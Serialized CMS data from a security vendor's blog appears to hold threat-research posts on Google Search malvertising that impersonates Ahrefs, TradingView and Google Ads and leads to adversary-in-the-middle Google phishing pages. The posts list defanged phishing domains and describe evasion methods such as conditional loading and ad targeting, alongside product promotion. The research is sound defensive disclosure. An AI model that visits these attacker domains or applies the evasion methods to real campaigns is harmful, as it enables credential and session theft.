"data":27674,"content":27675,"nodeType":945},{},[27676],{"data":27677,"content":27678,"nodeType":860},{},[27679],{"data":27680,"marks":27681,"value":21111,"nodeType":864},{},[],{"data":27683,"content":27684,"nodeType":945},{},[27685],{"data":27686,"content":27687,"nodeType":860},{},[27688],{"data":27689,"marks":27690,"value":21121,"nodeType":864},{},[],{"data":27692,"content":27693,"nodeType":945},{},[27694],{"data":27695,"content":27696,"nodeType":860},{},[27697],{"data":27698,"marks":27699,"value":21131,"nodeType":864},{},[],{"data":27701,"content":27702,"nodeType":945},{},[27703],{"data":27704,"content":27705,"nodeType":860},{},[27706],{"data":27707,"marks":27708,"value":21141,"nodeType":864},{},[],{"data":27710,"content":27711,"nodeType":860},{},[27712],{"data":27713,"marks":27714,"value":21148,"nodeType":864},{},[],{"data":27716,"content":27717,"nodeType":941},{},[27718,27727,27736,27745],{"data":27719,"content":27720,"nodeType":945},{},[27721],{"data":27722,"content":27723,"nodeType":860},{},[27724],{"data":27725,"marks":27726,"value":21161,"nodeType":864},{},[],{"data":27728,"content":27729,"nodeType":945},{},[27730],{"data":27731,"content":27732,"nodeType":860},{},[27733],{"data":27734,"marks":27735,"value":21171,"nodeType":864},{},[],{"data":27737,"content":27738,"nodeType":945},{},[27739],{"data":27740,"content":27741,"nodeType":860},{},[27742],{"data":27743,"marks":27744,"value":21181,"nodeType":864},{},[],{"data":27746,"content":27747,"nodeType":945},{},[27748],{"data":27749,"content":27750,"nodeType":860},{},[27751],{"data":27752,"marks":27753,"value":21191,"nodeType":864},{},[],{"data":27755,"content":27756,"nodeType":860},{},[27757],{"data":27758,"marks":27759,"value":21198,"nodeType":864},{},[],{"data":27761,"content":27762,"nodeType":941},{},[27763,27772,27781,27790,27799,27808,27817],{"data":27764,"content":27765,"nodeType":945},{},[27766],{"data":27767,"content":27768,"nodeType":860},{},[27769],{"data":27770,"marks":27771,"value":21211,"nodeType":864},{},[],{"data":27773,"content":27774,"nodeType":945},{},[27775],{"data":27776,"content":27777,"nodeType":860},{},[27778],{"data":27779,"marks":27780,"value":21221,"nodeType":864},{},[],{"data":27782,"content":27783,"nodeType":945},{},[27784],{"data":27785,"content":27786,"nodeType":860},{},[27787],{"data":27788,"marks":27789,"value":21231,"nodeType":864},{},[],{"data":27791,"content":27792,"nodeType":945},{},[27793],{"data":27794,"content":27795,"nodeType":860},{},[27796],{"data":27797,"marks":27798,"value":21241,"nodeType":864},{},[],{"data":27800,"content":27801,"nodeType":945},{},[27802],{"data":27803,"content":27804,"nodeType":860},{},[27805],{"data":27806,"marks":27807,"value":21251,"nodeType":864},{},[],{"data":27809,"content":27810,"nodeType":945},{},[27811],{"data":27812,"content":27813,"nodeType":860},{},[27814],{"data":27815,"marks":27816,"value":21261,"nodeType":864},{},[],{"data":27818,"content":27819,"nodeType":945},{},[27820],{"data":27821,"content":27822,"nodeType":860},{},[27823],{"data":27824,"marks":27825,"value":21271,"nodeType":864},{},[],{"data":27827,"content":27828,"nodeType":860},{},[27829],{"data":27830,"marks":27831,"value":7196,"nodeType":864},{},[27832],{"type":899},{"entries":27834},{"hyperlink":27835,"inline":27836,"block":27837},[],[],[27838,27844,27848,27874,27878,27885,27910,27915,27920],{"sys":27839,"__typename":1724,"title":27840,"caption":27840,"layoutMode":59,"file":27841},{"id":20752},"We reported on this campaign running malicious ads for “Google Ads” in December.",{"url":27842,"width":1736,"height":27843},"https://images.ctfassets.net/y1cdw1ablpvd/4thOH70HwzZnhzWcU2zUAP/cf64ff8825037b233d5ab34bdb11d97f/image4.png",1205,{"sys":27845,"__typename":18759,"title":27846,"arcadeDemoUrl":27847,"playText":18762},{"id":20772},"Ahrefs Malvertising Attack Demo","https://demo.arcade.software/9O3tGrFzckBbTlRSnyEK?embed",{"sys":27849,"__typename":1740,"content":27850,"name":27873,"title":59},{"id":20778},{"json":27851},{"nodeType":856,"data":27852,"content":27853},{},[27854,27866],{"nodeType":860,"data":27855,"content":27856},{},[27857,27862],{"nodeType":864,"value":27858,"marks":27859,"data":27861},"Update 24th February: ",[27860],{"type":899},{},{"nodeType":864,"value":27863,"marks":27864,"data":27865},"We discovered additional activity relating to this campaign with more Ahrefs malvertising on Google Search, this time pointing to fake domains hosted on surge[.]sh. We also blocked Push customers from interacting with a similar ad impersonating Semrush, also hosted on surge[.]sh. ",[],{},{"nodeType":860,"data":27867,"content":27868},{},[27869],{"nodeType":864,"value":27870,"marks":27871,"data":27872},"New IoCs have been added and you can see a video of this new attack below. ",[],{},"Ahrefs malvertising insight box 3",{"sys":27875,"__typename":18759,"title":27876,"arcadeDemoUrl":27877,"playText":18762},{"id":20784},"Ahrefs Malvertising v2","https://demo.arcade.software/3QIKy5x7kmMd0oSrFeOB?embed",{"sys":27879,"__typename":1724,"title":27880,"caption":27881,"layoutMode":59,"file":27882},{"id":20808},"Ahrefs malvertising lure","Ahrefs malvertising link featured on Google Search under \"Sponsored Results\"",{"url":27883,"width":1736,"height":27884},"https://images.ctfassets.net/y1cdw1ablpvd/6pfKxxRmvykxJ2t5xFJmpz/fc8d3d65b22beea965f1a45dae0b249c/image1.png",1126,{"sys":27886,"__typename":1740,"content":27887,"name":27909,"title":59},{"id":20821},{"json":27888},{"data":27889,"content":27890,"nodeType":856},{},[27891],{"data":27892,"content":27893,"nodeType":860},{},[27894,27898,27906],{"data":27895,"marks":27896,"value":27897,"nodeType":864},{},[],"Notably, the site’s language is set to Brazilian Portuguese in the HTML (lang=\"pt-BR\"). Based on this, the campaign is likely linked to the same threat actors ",{"data":27899,"content":27900,"nodeType":883},{"uri":25114},[27901],{"data":27902,"marks":27903,"value":27905,"nodeType":864},{},[27904],{"type":1455},"reported by MalwareBytes in January 2025",{"data":27907,"marks":27908,"value":10094,"nodeType":864},{},[],"Ahrefs malvertising insight box 1",{"sys":27911,"__typename":1724,"title":27912,"caption":27912,"layoutMode":59,"file":27913},{"id":20827},"Fake Ahrefs landing page",{"url":27914,"width":1736,"height":27884},"https://images.ctfassets.net/y1cdw1ablpvd/6vlPpGpLhMOTo5ijMxZav0/bfe816a0f301914d334ec9db9dfa56b1/image2.png",{"sys":27916,"__typename":1724,"title":27917,"caption":27917,"layoutMode":59,"file":27918},{"id":20840},"Cloned Google login page used to perform AITM phishing",{"url":27919,"width":1736,"height":27884},"https://images.ctfassets.net/y1cdw1ablpvd/5uh2f3ONpNQgMssDfdtALK/1edd93a6365e60049a01367b7b7b9448/image4.png",{"sys":27921,"__typename":1740,"content":27922,"name":27959,"title":59},{"id":20902},{"json":27923},{"nodeType":856,"data":27924,"content":27925},{},[27926,27933,27940],{"nodeType":860,"data":27927,"content":27928},{},[27929],{"nodeType":864,"value":27930,"marks":27931,"data":27932},"It’s also worth noting that a Google Ad Manager account is also an enterprise SSO account that can be used to access broader Google Workspace services and any connected apps that are SSO-enabled. ",[],{},{"nodeType":860,"data":27934,"content":27935},{},[27936],{"nodeType":864,"value":27937,"marks":27938,"data":27939},"Even if the victim isn’t predominantly a Google house, a Google account using the same email as a different identity provider account (e.g. Microsoft) can still be used to access downstream apps via SSO. This is because most apps use email as an identifier, while 3 in 5 apps also allow you to access an account using a new login method without doing any further verification checks. ",[],{},{"nodeType":860,"data":27941,"content":27942},{},[27943,27947,27955],{"nodeType":864,"value":25153,"marks":27944,"data":27946},[27945],{"type":899},{},{"nodeType":883,"data":27948,"content":27949},{"uri":25156},[27950],{"nodeType":864,"value":25163,"marks":27951,"data":27954},[27952,27953],{"type":1455},{"type":899},{},{"nodeType":864,"value":25168,"marks":27956,"data":27958},[27957],{"type":899},{},"Ahrefs malvertising insight box 2",{"items":27961},[],{},"Google Search malvertising campaign impersonating Ahrefs",{"items":27965},[27966,28408,28796],{"__typename":2059,"sys":27967,"content":27969,"title":28394,"synopsis":28395,"hashTags":59,"publishedDate":28396,"slug":28397,"tagsCollection":28398,"authorsCollection":28404},{"id":27968},"2obwh6WiK5IP0hnqsV4CZQ",{"json":27970},{"data":27971,"content":27972,"nodeType":856},{},[27973,27980,27987,27994,28001,28007,28010,28017,28024,28030,28037,28043,28049,28056,28062,28069,28075,28082,28088,28091,28099,28117,28125,28143,28161,28167,28175,28194,28200,28206,28213,28216,28224,28243,28249,28256,28259,28266,28282,28288,28321,28324,28331,28350,28357,28383,28388],{"data":27974,"content":27975,"nodeType":860},{},[27976],{"data":27977,"marks":27978,"value":27979,"nodeType":864},{},[],"We recently detected and blocked a particularly well-crafted malvertising attack targeting one of our customers. ",{"data":27981,"content":27982,"nodeType":860},{},[27983],{"data":27984,"marks":27985,"value":27986,"nodeType":864},{},[],"The employee had searched for “tradingview” on Google and been served a malicious ad impersonating the real site, which they had clicked. ",{"data":27988,"content":27989,"nodeType":860},{},[27990],{"data":27991,"marks":27992,"value":27993,"nodeType":864},{},[],"As well as being a highly convincing clone of the real site, this attack demonstrated a number of creative detection evasion techniques designed to prevent security tools, analysts, and web scraping bots from flagging it as malicious. ",{"data":27995,"content":27996,"nodeType":860},{},[27997],{"data":27998,"marks":27999,"value":28000,"nodeType":864},{},[],"You can see a narrated clickthrough of the end-to-end attack in the video below. ",{"data":28002,"content":28006,"nodeType":996},{"target":28003},{"sys":28004},{"id":28005,"type":1001,"linkType":1002},"V8NYoNBZBSZXSNBo2AfUZ",[],{"data":28008,"content":28009,"nodeType":1005},{},[],{"data":28011,"content":28012,"nodeType":1009},{},[28013],{"data":28014,"marks":28015,"value":20796,"nodeType":864},{},[28016],{"type":899},{"data":28018,"content":28019,"nodeType":860},{},[28020],{"data":28021,"marks":28022,"value":28023,"nodeType":864},{},[],"When the victim clicked the malicious ad, they were initially directed to tradingview-charts-compare.primevoro[.]com, but then immediately redirected to a second site. In effect, the victim would never see this initial page — it is simply used as a benign site that only forwards the victim on if certain parameters are supplied from the initial Google ad link. ",{"data":28025,"content":28029,"nodeType":996},{"target":28026},{"sys":28027},{"id":28028,"type":1001,"linkType":1002},"1v5dADDY2y9EAwCZ7ZnWVi",[],{"data":28031,"content":28032,"nodeType":860},{},[28033],{"data":28034,"marks":28035,"value":28036,"nodeType":864},{},[],"The first site that the victim would see is visually identical to the real TradingView site, at tradingplatforms[.]app. ",{"data":28038,"content":28042,"nodeType":996},{"target":28039},{"sys":28040},{"id":28041,"type":1001,"linkType":1002},"iHIbILX30HMnqM4NXx86G",[],{"data":28044,"content":28048,"nodeType":996},{"target":28045},{"sys":28046},{"id":28047,"type":1001,"linkType":1002},"2nK9Y4ZFejHtbWT2GcVNM1",[],{"data":28050,"content":28051,"nodeType":860},{},[28052],{"data":28053,"marks":28054,"value":28055,"nodeType":864},{},[],"Upon clicking the login button, they are taken to another convincingly designed page, where the victim is prompted to sign in with Google. ",{"data":28057,"content":28061,"nodeType":996},{"target":28058},{"sys":28059},{"id":28060,"type":1001,"linkType":1002},"6il7lhKUz5VIgQW9shl9oc",[],{"data":28063,"content":28064,"nodeType":860},{},[28065],{"data":28066,"marks":28067,"value":28068,"nodeType":864},{},[],"Upon clicking the sign in with Google button, the victim is finally taken to the reverse proxy Attacker-in-the-Middle phishing page targeting Google. If the victim logs in, their credentials and live session is stolen by the attacker. ",{"data":28070,"content":28074,"nodeType":996},{"target":28071},{"sys":28072},{"id":28073,"type":1001,"linkType":1002},"3LSrYN6X2qnBiMBoPi1Qse",[],{"data":28076,"content":28077,"nodeType":860},{},[28078],{"data":28079,"marks":28080,"value":28081,"nodeType":864},{},[],"You can see the timeline of URLs accessed in the chain captured in Push’s timeline feature, below. When we investigated, the phishing page had no user reports on urlscan. ",{"data":28083,"content":28087,"nodeType":996},{"target":28084},{"sys":28085},{"id":28086,"type":1001,"linkType":1002},"5spFXtWBhTtB4LO3cYHv8Z",[],{"data":28089,"content":28090,"nodeType":1005},{},[],{"data":28092,"content":28093,"nodeType":1009},{},[28094],{"data":28095,"marks":28096,"value":28098,"nodeType":864},{},[28097],{"type":899},"How did this attack evade standard detections?",{"data":28100,"content":28101,"nodeType":860},{},[28102,28106,28113],{"data":28103,"marks":28104,"value":28105,"nodeType":864},{},[],"It’s increasingly common for malicious sites to fly under the radar because of the effective use of ",{"data":28107,"content":28108,"nodeType":883},{"uri":7124},[28109],{"data":28110,"marks":28111,"value":13810,"nodeType":864},{},[28112],{"type":1455},{"data":28114,"marks":28115,"value":28116,"nodeType":864},{},[],", designed to defeat traditional security tools and web-scraping security bots. ",{"data":28118,"content":28119,"nodeType":1312},{},[28120],{"data":28121,"marks":28122,"value":28124,"nodeType":864},{},[28123],{"type":899},"Malvertising completely bypasses email-based controls",{"data":28126,"content":28127,"nodeType":860},{},[28128,28132,28139],{"data":28129,"marks":28130,"value":28131,"nodeType":864},{},[],"By delivering the lure via ",{"data":28133,"content":28134,"nodeType":883},{"uri":23426},[28135],{"data":28136,"marks":28137,"value":441,"nodeType":864},{},[28138],{"type":1455},{"data":28140,"marks":28141,"value":28142,"nodeType":864},{},[],", the attacker was able to completely bypass the most common phishing detection surface — email. ",{"data":28144,"content":28145,"nodeType":860},{},[28146,28150,28157],{"data":28147,"marks":28148,"value":28149,"nodeType":864},{},[],"Malvertising via channels like Google Search is an effective way to launch “watering hole” style attacks, casting a wide net to harvest credentials and account access that can be re-sold to other criminals for a fee, or leveraged by partners in the cybercriminal ecosystem as part of major cyber breaches (such as the recent attacks by the “",{"data":28151,"content":28152,"nodeType":883},{"uri":6237},[28153],{"data":28154,"marks":28155,"value":6242,"nodeType":864},{},[28156],{"type":1455},{"data":28158,"marks":28159,"value":28160,"nodeType":864},{},[],"” criminal collective, all of which began with identity-based initial access). For this reason, credentials and account access are an increasingly profitable commodity for cyber criminals. ",{"data":28162,"content":28166,"nodeType":996},{"target":28163},{"sys":28164},{"id":28165,"type":1001,"linkType":1002},"7cq2IbGHIFH2UhkjIrwxGd",[],{"data":28168,"content":28169,"nodeType":1312},{},[28170],{"data":28171,"marks":28172,"value":28174,"nodeType":864},{},[28173],{"type":899},"Conditional loading parameters prevented the site being flagged as known-bad",{"data":28176,"content":28177,"nodeType":860},{},[28178,28182,28190],{"data":28179,"marks":28180,"value":28181,"nodeType":864},{},[],"The attacker used clever ",{"data":28183,"content":28184,"nodeType":883},{"uri":26883},[28185],{"data":28186,"marks":28187,"value":28189,"nodeType":864},{},[28188],{"type":1455},"conditional loading",{"data":28191,"marks":28192,"value":28193,"nodeType":864},{},[]," techniques to prevent the page being accessed unless the correct steps were followed. This means that security analysts attempting to load one of the pages in isolation would either be served with a benign page, or be blocked from accessing the page in order to analyse it for malicious content.  ",{"data":28195,"content":28199,"nodeType":996},{"target":28196},{"sys":28197},{"id":28198,"type":1001,"linkType":1002},"2vjZTsrjuILnt5UjNx9Nce",[],{"data":28201,"content":28205,"nodeType":996},{"target":28202},{"sys":28203},{"id":28204,"type":1001,"linkType":1002},"3pOLIA4beNZ9tU87YLlhT0",[],{"data":28207,"content":28208,"nodeType":860},{},[28209],{"data":28210,"marks":28211,"value":28212,"nodeType":864},{},[],"Further, the attacker tightly scoped the initial malvertising lure to prevent unwanted visitors. Google Ads can be targeted to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). If you know where your target organization is located, you can tailor the ad to that location. ",{"data":28214,"content":28215,"nodeType":1005},{},[],{"data":28217,"content":28218,"nodeType":1009},{},[28219],{"data":28220,"marks":28221,"value":28223,"nodeType":864},{},[28222],{"type":899},"Further observations",{"data":28225,"content":28226,"nodeType":860},{},[28227,28230,28239],{"data":28228,"marks":28229,"value":21,"nodeType":864},{},[],{"data":28231,"content":28233,"nodeType":883},{"uri":28232},"https://www.bleepingcomputer.com/news/security/google-ads-for-fake-homebrew-logmein-sites-push-infostealers/",[28234],{"data":28235,"marks":28236,"value":28238,"nodeType":864},{},[28237],{"type":1455},"According to security researchers",{"data":28240,"marks":28241,"value":28242,"nodeType":864},{},[],", attackers have been recently observed running ClickFix malvertising campaigns over Google Search that also impersonated TradingView. These attacks attempted to deliver malware to Mac users, harvesting sensitive information stored in the browser, cryptocurrency credentials, and exfiltrating to the command and control server.",{"data":28244,"content":28248,"nodeType":996},{"target":28245},{"sys":28246},{"id":28247,"type":1001,"linkType":1002},"VeLfUptGY8ygKHroPxTby",[],{"data":28250,"content":28251,"nodeType":860},{},[28252],{"data":28253,"marks":28254,"value":28255,"nodeType":864},{},[],"Attackers have been known to target investment and cryptocurrency accounts, particularly those aligned with North Korean state-sponsored operations. This is both targeting individual users as well as business accounts used in operating exchanges themselves, such as in the massive Bybit hack earlier this year. ",{"data":28257,"content":28258,"nodeType":1005},{},[],{"data":28260,"content":28261,"nodeType":1009},{},[28262],{"data":28263,"marks":28264,"value":5571,"nodeType":864},{},[28265],{"type":899},{"data":28267,"content":28268,"nodeType":860},{},[28269,28272,28279],{"data":28270,"marks":28271,"value":12615,"nodeType":864},{},[],{"data":28273,"content":28274,"nodeType":883},{"uri":7248},[28275],{"data":28276,"marks":28277,"value":7253,"nodeType":864},{},[28278],{"type":1455},{"data":28280,"marks":28281,"value":18496,"nodeType":864},{},[],{"data":28283,"content":28284,"nodeType":860},{},[28285],{"data":28286,"marks":28287,"value":21098,"nodeType":864},{},[],{"data":28289,"content":28290,"nodeType":941},{},[28291,28301,28311],{"data":28292,"content":28293,"nodeType":945},{},[28294],{"data":28295,"content":28296,"nodeType":860},{},[28297],{"data":28298,"marks":28299,"value":28300,"nodeType":864},{},[],"hxxps://tradingview-charts-compare.primevoro.com",{"data":28302,"content":28303,"nodeType":945},{},[28304],{"data":28305,"content":28306,"nodeType":860},{},[28307],{"data":28308,"marks":28309,"value":28310,"nodeType":864},{},[],"hxxps://tradingplatforms.app",{"data":28312,"content":28313,"nodeType":945},{},[28314],{"data":28315,"content":28316,"nodeType":860},{},[28317],{"data":28318,"marks":28319,"value":28320,"nodeType":864},{},[],"hxxps://accounts.aeonnailspa.com",{"data":28322,"content":28323,"nodeType":1005},{},[],{"data":28325,"content":28326,"nodeType":1009},{},[28327],{"data":28328,"marks":28329,"value":21018,"nodeType":864},{},[28330],{"type":899},{"data":28332,"content":28333,"nodeType":860},{},[28334,28338,28346],{"data":28335,"marks":28336,"value":28337,"nodeType":864},{},[],"Push doesn’t detect the redirect tricks or rely on outdated domain TI feeds. The reason we detect these attacks (which make it through all the other layers of phishing protection) is that Push sees what your users see. It doesn’t matter what ",{"data":28339,"content":28340,"nodeType":883},{"uri":7124},[28341],{"data":28342,"marks":28343,"value":28345,"nodeType":864},{},[28344],{"type":1455},"delivery channel or camouflage methods are used",{"data":28347,"marks":28348,"value":28349,"nodeType":864},{},[],", Push shuts the attack down in real time, as the user loads the malicious page in their web browser.",{"data":28351,"content":28352,"nodeType":860},{},[28353],{"data":28354,"marks":28355,"value":28356,"nodeType":864},{},[],"This isn’t all we do: Push’s browser-based security platform provides comprehensive detection and response capabilities against the leading cause of breaches. Push blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, malicious OAuth grants, ClickFix, and session hijacking. You don’t need to wait until it all goes wrong — you can also use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your identity attack surface.",{"data":28358,"content":28359,"nodeType":860},{},[28360,28363,28370,28373,28380],{"data":28361,"marks":28362,"value":16314,"nodeType":864},{},[],{"data":28364,"content":28365,"nodeType":883},{"uri":10269},[28366],{"data":28367,"marks":28368,"value":10275,"nodeType":864},{},[28369],{"type":1455},{"data":28371,"marks":28372,"value":19754,"nodeType":864},{},[],{"data":28374,"content":28375,"nodeType":883},{"uri":1700},[28376],{"data":28377,"marks":28378,"value":10299,"nodeType":864},{},[28379],{"type":1455},{"data":28381,"marks":28382,"value":2924,"nodeType":864},{},[],{"data":28384,"content":28387,"nodeType":996},{"target":28385},{"sys":28386},{"id":27224,"type":1001,"linkType":1002},[],{"data":28389,"content":28390,"nodeType":860},{},[28391],{"data":28392,"marks":28393,"value":21,"nodeType":864},{},[],"Analysing a sophisticated Google malvertising attack impersonating TradingView","Push recently detected and blocked a malvertising attack impersonating TradingView designed to hijack Google Workspace accounts.","2025-12-08T00:00:00.000Z","analysing-a-sophisticated-google-malvertising-attack",{"items":28399},[28400,28402],{"sys":28401,"name":6593},{"id":6592},{"sys":28403,"name":342},{"id":6596},{"items":28405},[28406],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":28407},{"url":2740},{"__typename":2059,"sys":28409,"content":28411,"title":28782,"synopsis":28783,"hashTags":59,"publishedDate":28784,"slug":28785,"tagsCollection":28786,"authorsCollection":28792},{"id":28410},"72lLmy0CXnOp3LWOdcUguX",{"json":28412},{"data":28413,"content":28414,"nodeType":856},{},[28415,28422,28429,28435,28442,28475,28482,28488,28495,28501,28507,28513,28519,28525,28528,28536,28543,28550,28557,28565,28571,28589,28596,28613,28618,28621,28628,28635,28708,28715,28718,28725,28732,28739,28745,28771,28776],{"data":28416,"content":28417,"nodeType":1009},{},[28418],{"data":28419,"marks":28420,"value":20796,"nodeType":864},{},[28421],{"type":899},{"data":28423,"content":28424,"nodeType":860},{},[28425],{"data":28426,"marks":28427,"value":28428,"nodeType":864},{},[],"We recently detected and blocked a malvertising attack impacting one of our customer’s employees. The employee had searched for “Google ads” in Google Search to log into their Google Ads Manager account.  ",{"data":28430,"content":28434,"nodeType":996},{"target":28431},{"sys":28432},{"id":28433,"type":1001,"linkType":1002},"40RyyKZC0R07wLU1OZBmH",[],{"data":28436,"content":28437,"nodeType":860},{},[28438],{"data":28439,"marks":28440,"value":28441,"nodeType":864},{},[],"The user:",{"data":28443,"content":28444,"nodeType":941},{},[28445,28455,28465],{"data":28446,"content":28447,"nodeType":945},{},[28448],{"data":28449,"content":28450,"nodeType":860},{},[28451],{"data":28452,"marks":28453,"value":28454,"nodeType":864},{},[],"Searched for “Google ads” in Google Search",{"data":28456,"content":28457,"nodeType":945},{},[28458],{"data":28459,"content":28460,"nodeType":860},{},[28461],{"data":28462,"marks":28463,"value":28464,"nodeType":864},{},[],"Click the ad for hxxps://ads-adsword1.odoo.com/…",{"data":28466,"content":28467,"nodeType":945},{},[28468],{"data":28469,"content":28470,"nodeType":860},{},[28471],{"data":28472,"marks":28473,"value":28474,"nodeType":864},{},[],"Was redirected to hxxps://sing-operador2.click/accounts/v3/login/ where the phishing form was blocked. ",{"data":28476,"content":28477,"nodeType":860},{},[28478],{"data":28479,"marks":28480,"value":28481,"nodeType":864},{},[],"When we came to investigate this detection further, we found that the site had already been taken down.  ",{"data":28483,"content":28487,"nodeType":996},{"target":28484},{"sys":28485},{"id":28486,"type":1001,"linkType":1002},"6eAIVxgaEDQ9krKZvu8zyI",[],{"data":28489,"content":28490,"nodeType":860},{},[28491],{"data":28492,"marks":28493,"value":28494,"nodeType":864},{},[],"However, we were able to replicate the user’s activity to find other examples that show clear signs of being linked to the same campaign — both hosted on Odoo, with one also using Kartra as a redirect.",{"data":28496,"content":28500,"nodeType":996},{"target":28497},{"sys":28498},{"id":28499,"type":1001,"linkType":1002},"1wGu0slZcKBNIUhuNk5SZN",[],{"data":28502,"content":28506,"nodeType":996},{"target":28503},{"sys":28504},{"id":28505,"type":1001,"linkType":1002},"5SqaaD4vDzvdkzVX8ypxvB",[],{"data":28508,"content":28512,"nodeType":996},{"target":28509},{"sys":28510},{"id":28511,"type":1001,"linkType":1002},"7IT185wut2jTtQy1lC9F5t",[],{"data":28514,"content":28518,"nodeType":996},{"target":28515},{"sys":28516},{"id":28517,"type":1001,"linkType":1002},"78WkGo9ZTio1fYvfP7W68",[],{"data":28520,"content":28524,"nodeType":996},{"target":28521},{"sys":28522},{"id":28523,"type":1001,"linkType":1002},"5CWMR1gxq3Uao4HGGhRLKE",[],{"data":28526,"content":28527,"nodeType":1005},{},[],{"data":28529,"content":28530,"nodeType":1009},{},[28531],{"data":28532,"marks":28533,"value":28535,"nodeType":864},{},[28534],{"type":899},"Why malvertising & Google ads?",{"data":28537,"content":28538,"nodeType":860},{},[28539],{"data":28540,"marks":28541,"value":28542,"nodeType":864},{},[],"Malvertising attacks delivered over channels like Google Search are a great way to catch victims unawares while also evading typically email-based anti-phishing controls. ",{"data":28544,"content":28545,"nodeType":860},{},[28546],{"data":28547,"marks":28548,"value":28549,"nodeType":864},{},[],"The flipside of this is that malvertising attacks are less likely to be targeted than phishing delivered directly to the victim via a direct message (i.e. email, social media DM, instant messenger app, SMS, etc.). This appears to be true in this case: we were served the ad from a UK location despite the initial ad targeting an EU-based company. ",{"data":28551,"content":28552,"nodeType":860},{},[28553],{"data":28554,"marks":28555,"value":28556,"nodeType":864},{},[],"However, that isn’t to say that malvertising attacks can’t be targeted. For example, Google Ads can be targeted to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). If you know where your target organization is located, you can tailor the ad to that location. Even more precise ad targeting can be achieved on social media platforms. ",{"data":28558,"content":28559,"nodeType":860},{},[28560],{"data":28561,"marks":28562,"value":28564,"nodeType":864},{},[28563],{"type":899},"In this case, it appears that the attacker was specifically targeting Google Ad Manager accounts. ",{"data":28566,"content":28570,"nodeType":996},{"target":28567},{"sys":28568},{"id":28569,"type":1001,"linkType":1002},"5JA7xWPghOBln49SfkvefW",[],{"data":28572,"content":28573,"nodeType":860},{},[28574,28578,28585],{"data":28575,"marks":28576,"value":28577,"nodeType":864},{},[],"With malvertising on the rise as an increasingly popular attack vector for the delivery of AITM phishing, malware downloads, and ",{"data":28579,"content":28580,"nodeType":883},{"uri":13019},[28581],{"data":28582,"marks":28583,"value":315,"nodeType":864},{},[28584],{"type":1455},{"data":28586,"marks":28587,"value":28588,"nodeType":864},{},[]," (4 in 5 ClickFix attacks intercepted by Push were delivered via Google Search), it makes sense that attackers are looking to increase their web of accounts from which to launch malicious ads. ",{"data":28590,"content":28591,"nodeType":860},{},[28592],{"data":28593,"marks":28594,"value":28595,"nodeType":864},{},[],"Particularly for organizations that are running large numbers of ads with pre-allocated budget/cards for their ad account, or organizations performing ad management/marketing services on behalf of other organizations, it’s easy to see how attackers can take over these accounts and spin up malicious ads. ",{"data":28597,"content":28598,"nodeType":860},{},[28599,28603,28610],{"data":28600,"marks":28601,"value":28602,"nodeType":864},{},[],"Malvertising via Google Search is an effective way to launch “watering hole” style attacks, casting a wide net to harvest credentials and account access that can be re-sold to other criminals for a fee, or leveraged by partners in the cybercriminal ecosystem as part of major cyber breaches (such as the recent attacks by the “",{"data":28604,"content":28605,"nodeType":883},{"uri":6237},[28606],{"data":28607,"marks":28608,"value":6242,"nodeType":864},{},[28609],{"type":1455},{"data":28611,"marks":28612,"value":28160,"nodeType":864},{},[],{"data":28614,"content":28617,"nodeType":996},{"target":28615},{"sys":28616},{"id":27224,"type":1001,"linkType":1002},[],{"data":28619,"content":28620,"nodeType":1005},{},[],{"data":28622,"content":28623,"nodeType":1009},{},[28624],{"data":28625,"marks":28626,"value":5571,"nodeType":864},{},[28627],{"type":899},{"data":28629,"content":28630,"nodeType":860},{},[28631],{"data":28632,"marks":28633,"value":28634,"nodeType":864},{},[],"The following domains were involved in the attacks:",{"data":28636,"content":28637,"nodeType":941},{},[28638,28648,28658,28668,28678,28688,28698],{"data":28639,"content":28640,"nodeType":945},{},[28641],{"data":28642,"content":28643,"nodeType":860},{},[28644],{"data":28645,"marks":28646,"value":28647,"nodeType":864},{},[],"hxxps://ads-adsword1.odoo.com",{"data":28649,"content":28650,"nodeType":945},{},[28651],{"data":28652,"content":28653,"nodeType":860},{},[28654],{"data":28655,"marks":28656,"value":28657,"nodeType":864},{},[],"hxxps://sing-operador2.click/accounts/v3/login",{"data":28659,"content":28660,"nodeType":945},{},[28661],{"data":28662,"content":28663,"nodeType":860},{},[28664],{"data":28665,"marks":28666,"value":28667,"nodeType":864},{},[],"hxxps://adsgooglie.odoo.com/",{"data":28669,"content":28670,"nodeType":945},{},[28671],{"data":28672,"content":28673,"nodeType":860},{},[28674],{"data":28675,"marks":28676,"value":28677,"nodeType":864},{},[],"hxxps://word4only.online/",{"data":28679,"content":28680,"nodeType":945},{},[28681],{"data":28682,"content":28683,"nodeType":860},{},[28684],{"data":28685,"marks":28686,"value":28687,"nodeType":864},{},[],"hxxps://adsloginacess.kartra.com/page/oeN7",{"data":28689,"content":28690,"nodeType":945},{},[28691],{"data":28692,"content":28693,"nodeType":860},{},[28694],{"data":28695,"marks":28696,"value":28697,"nodeType":864},{},[],"hxxps://ads-o.odoo.com",{"data":28699,"content":28700,"nodeType":945},{},[28701],{"data":28702,"content":28703,"nodeType":860},{},[28704],{"data":28705,"marks":28706,"value":28707,"nodeType":864},{},[],"hxxps://operador8-ads.lat/accounts/v3/login/",{"data":28709,"content":28710,"nodeType":860},{},[28711],{"data":28712,"marks":28713,"value":28714,"nodeType":864},{},[],"However, with the rate at which these domains were spun up and subsequently taken down (by the attacker or the site hosting the links) IoC-based detections for campaigns such as this are of limited value. ",{"data":28716,"content":28717,"nodeType":1005},{},[],{"data":28719,"content":28720,"nodeType":1009},{},[28721],{"data":28722,"marks":28723,"value":21018,"nodeType":864},{},[28724],{"type":899},{"data":28726,"content":28727,"nodeType":860},{},[28728],{"data":28729,"marks":28730,"value":28731,"nodeType":864},{},[],"Regardless of the delivery channel, all roads lead to a web page accessed in the victim’s browser — where Push is waiting to detect and block the attack. ",{"data":28733,"content":28734,"nodeType":860},{},[28735],{"data":28736,"marks":28737,"value":28738,"nodeType":864},{},[],"By seeing what your users see, and getting an unfiltered, real-time view of the page as it loads, Push is able to pinpoint malicious content, code, and behaviors and shut the attack down before it happens. Whether it's entering credentials onto a phishing page, approving a malicious OAuth grant, installing a risky browser extension, or insecurely accessing an app with a weak password and no MFA, Push detects the action and responds in 